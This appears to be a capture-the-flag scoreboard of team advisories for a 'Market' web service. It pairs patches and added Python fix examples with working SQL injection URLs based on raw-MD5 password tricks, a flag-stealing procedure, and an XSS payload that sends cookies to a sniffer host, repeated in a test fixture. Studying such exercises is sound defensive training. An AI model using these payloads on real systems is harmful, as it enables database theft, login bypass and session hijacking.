Market Advisories


Service: Market
Text: We can re-register the user names of existing users, replacing their password with one of our own.
Fix:

cursor.execute ("SELECT * FROM users WHERE login=\"" + conn.escape_string(login) + "\"")
rows = cursor.fetchall ()
if len(rows) > 0:
    err += "\n<br />User is already registered"
Jury comment: Yep!
Score: 1/1 point


Service: Market
Text: [FluxFingers ASCII-art "Advisory" banner]
------------------------------ [[ FluxFingers ]] ------------------------------
--[ Description ]--------------------------------------------------------------
Market has a SQL-Injection in the password parameter in every SQL-Query that uses it, because it stores the
md5 hashes as binary and not as a hex string.

Vulnerable code in auth.py and reg.mix.

--[ Patch ]--------------------------------------------------------------------
In every single SQL-Query in auth.py and reg.mix replace 'md5.new(passwd).digest()' with 'conn.escape_string(md5.new(passwd).digest())'

--[ Exploit ]------------------------------------------------------------------
You can get arbitrary data by using this first request:

http://10.23.27.7:2121/reg.mix?login=kiki&pass=128&cpass=128&name=,concat(0x3a3a3a,(select cvc from credit limit 0,1),0x3a3a3a))-- -&cc=6666&cvc=6666&Sign+Up=Sign+Up

This request injects in the reg.mix query that inserts into the users table.
With the password 128 you get a '\' at the end of the md5 raw hash and you can escape
the quotes and have the name field as your payload. With a select subquery you can get arbitrary
data out of the database and insert it into the name field of the user in the users table.

With the second request

http://10.23.27.7:2121/status.mix?alogin=kiki&apass=583735&Sign+In=Sign+In

you bypass the login for the created user. The number 583735 in a raw md5 hash contains '"|"'
and causes the condition to be true. The website welcomes you with the name of the user that is stored in the
users table and so you can read the result of your injection.
Jury comment: yep!
Score: 7/7 points


Service: Market
Text: Advisory
* Description
Possible sql injection via a raw md5 value in reg.mix and auth.py

* Patch
reg.mix:
105 #cursor.execute ("SELECT * FROM users WHERE login=\"" + conn.escape_string(login) + "\" and pass=\"" + md5.new(passwd).digest() + "\"")
106 cursor.execute ("SELECT * FROM users WHERE login=\"" + conn.escape_string(login) + "\" and pass=\"" + conn.escape_string(md5.new(passwd).digest()) + "\"")

auth.py:
65 #cursor.execute ("SELECT * FROM users WHERE login=\"" + conn.escape_string(login) + "\" and pass=\"" + md5.new(passwd).digest() + "\"")
66 cursor.execute ("SELECT * FROM users WHERE login=\"" + conn.escape_string(login) + "\" and pass=\"" + conn.escape_string(md5.new(passwd).digest()) + "\"")

* Exploit

1. retrieve the login name for the gameserver user via http://#{ip}:2121/sell.mix
2. use the retrieved login name and, as password, "1319", which is a valid sql injection when converted to the corresponding md5 hash
3. retrieve flags (http://#{ip}:2121/requests.mix)
4. submit flags
Jury comment: Ok =) done.
Score: 3/3 points
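The two md5 advisories above describe one defect: a raw 16-byte digest is spliced into a double-quoted SQL literal, so any digest byte that is a '"' (or a trailing '\') ends or escapes the literal. The example below is added here and is not code from the service or from either team; escape_string is a hypothetical approximation of MySQLdb's conn.escape_string, sqlite3 stands in for MySQL, and the user row is constructed. It scans numeric passwords for one whose raw digest breaks the unpatched query (a regression check for the patch), confirms the escape_string fix keeps the literal intact, and shows the parameterized form that avoids string assembly altogether:

```python
import hashlib
import sqlite3


def raw_digest(passwd: str) -> bytes:
    """Raw 16-byte MD5 digest, the value the service's md5.new(passwd).digest() produced."""
    return hashlib.md5(passwd.encode("utf-8")).digest()


def escape_string(s: str) -> str:
    """Hypothetical stand-in for MySQLdb's conn.escape_string: backslash-escape the
    characters MySQL treats specially inside a quoted literal."""
    table = {"\x00": "\\0", "'": "\\'", '"': '\\"', "\\": "\\\\",
             "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}
    return "".join(table.get(c, c) for c in s)


def vulnerable_query(login: str, passwd: str) -> str:
    """Pre-patch shape of the auth.py / reg.mix query: login is escaped, the raw
    digest is concatenated verbatim (Python 2 str was bytes, so this 'worked')."""
    digest_text = raw_digest(passwd).decode("latin-1")  # one character per byte
    return ('SELECT * FROM users WHERE login="' + escape_string(login)
            + '" and pass="' + digest_text + '"')


def patched_query(login: str, passwd: str) -> str:
    """The fix both advisories propose: run the digest through escape_string too."""
    digest_text = raw_digest(passwd).decode("latin-1")
    return ('SELECT * FROM users WHERE login="' + escape_string(login)
            + '" and pass="' + escape_string(digest_text) + '"')


def literal_is_intact(query: str) -> bool:
    """Scan the query the way MySQL's lexer reads double-quoted strings: a backslash
    escapes the next character, an unescaped '"' toggles string state. Returns True
    only if exactly two literals (login and pass) open and close cleanly."""
    in_str, escaped, literals = False, False, 0
    for c in query:
        if escaped:
            escaped = False
        elif in_str and c == "\\":
            escaped = True
        elif c == '"':
            in_str = not in_str
            if not in_str:
                literals += 1
    return not in_str and literals == 2


def first_breaking_numeric_password(limit: int = 5000):
    """Regression check for the defect: the first numeric password whose raw digest
    makes the unpatched query malformed. Roughly 6% of digests contain a '"' byte
    and some end in a backslash, so one turns up quickly ('128' and '1319' on the
    page are values of this kind)."""
    for n in range(limit):
        pw = str(n)
        if not literal_is_intact(vulnerable_query("kiki", pw)):
            return pw
    return None


def demo_db() -> sqlite3.Connection:
    """Constructed in-memory users table with one account (sqlite3 stands in for MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT, pass BLOB)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("kiki", raw_digest("s3cret")))
    return conn


def login_ok_parameterized(conn: sqlite3.Connection, login: str, passwd: str) -> bool:
    """The stronger fix: bind the digest as a BLOB parameter, so no byte of it is
    ever parsed as SQL and escaping becomes irrelevant."""
    cur = conn.execute("SELECT 1 FROM users WHERE login=? AND pass=?",
                       (login, raw_digest(passwd)))
    return cur.fetchone() is not None


if __name__ == "__main__":
    pw = first_breaking_numeric_password()
    print("first literal-breaking numeric password:", pw)
    print("unpatched query intact:", literal_is_intact(vulnerable_query("kiki", pw)))
    print("patched query intact:  ", literal_is_intact(patched_query("kiki", pw)))
    db = demo_db()
    print("parameterized login, right password:", login_ok_parameterized(db, "kiki", "s3cret"))
    print("parameterized login, breaking password:", login_ok_parameterized(db, "kiki", pw))
```

Storing the digest as a hex string (hexdigest()) would also remove the problem, since hex characters can never terminate a literal; binding it as a parameter is preferable because it also covers every other field the service concatenates.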


Service: Market
Text: It is possible to brute-force flags char by char in the check.mix script:
http://10.23.x.3:2121/check.mix?content=$brutehere$&idu=[idu]&ida=[ida]&Sell=Sell

patch:
in check.mix replace line 108 with something like this:
cursor.execute ("SELECT * FROM purchaseAd WHERE ida=" + str(ida) + " AND content LIKE \"" + conn.escape_string(str(cont)) + "\"")
Jury comment: Exploit?
Score: 2/5 points


Service: Market
Text: XSS

File:
requests.mix

content += mtemplates.myreq(title, publicity, cont, cost, ida, message, sendtime, done, idr)

The parameters "title, publicity, cont, cost, ida, message, sendtime, done, idr" are not filtered for HTML entities.

Patch:
Replace with
content += mtemplates.myreq(escape(title,1), escape(publicity,1), escape(cont,1), escape(cost,1), escape(ida,1), escape(message,1), escape(sendtime,1), escape(done,1), escape(idr,1))

Exploit:
From an authenticated user, send the message:
http://vulnbox:2121/msg.mix?idu=[idu]&ida=[ida]&message=<script>document.location="sniffer_ip?cookie="+document.cookie</script>
Jury comment: ok. use it.
Score: 1/7 point
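As an added illustration of the XSS patch above (not the service's code: mtemplates.myreq is replaced by a hypothetical stand-in template and the request row is constructed), the following renders the same row with and without per-parameter escaping, using html.escape as the Python 3 counterpart of the escape(x, 1) in the advisory:

```python
import html

# Constructed sample row standing in for what requests.mix reads from the database;
# the field names follow the page's mtemplates.myreq call, the values are made up.
SAMPLE_REQUEST = {
    "title": "Buy 3 widgets", "publicity": "public", "cont": "sample_content",
    "cost": 40, "ida": 17,
    "message": '<script>document.location="http://sniffer.invalid/?c="+document.cookie</script>',
    "sendtime": "2012-11-17 10:15", "done": 0, "idr": 5,
}
FIELDS = ("title", "publicity", "cont", "cost", "ida", "message", "sendtime", "done", "idr")


def myreq_vulnerable(**row) -> str:
    """Hypothetical stand-in for mtemplates.myreq as called before the patch:
    every value is dropped into the HTML unchanged."""
    cells = "".join("<td>%s</td>" % row[f] for f in FIELDS)
    return "<tr>" + cells + "</tr>"


def myreq_patched(**row) -> str:
    """Same template with the advisory's fix applied at the call site: each value goes
    through escape(value, 1) first. html.escape(quote=True) is the Python 3 equivalent
    of cgi.escape(s, 1) and additionally escapes the single quote; str() is applied
    first because cost/ida/done/idr may arrive as integers."""
    safe = {f: html.escape(str(row[f]), quote=True) for f in FIELDS}
    return myreq_vulnerable(**safe)


def contains_tag(fragment: str, tag: str = "script") -> bool:
    """Detection helper: True if an unescaped opening tag survived into the output."""
    return ("<" + tag) in fragment.lower()


if __name__ == "__main__":
    print("unpatched:", myreq_vulnerable(**SAMPLE_REQUEST))
    print("patched:  ", myreq_patched(**SAMPLE_REQUEST))
```

Escaping at the call site, as the advisory does, works for this one template; escaping inside mtemplates.myreq itself would cover every caller, which is the usual reason to put output encoding in the template layer rather than at each use.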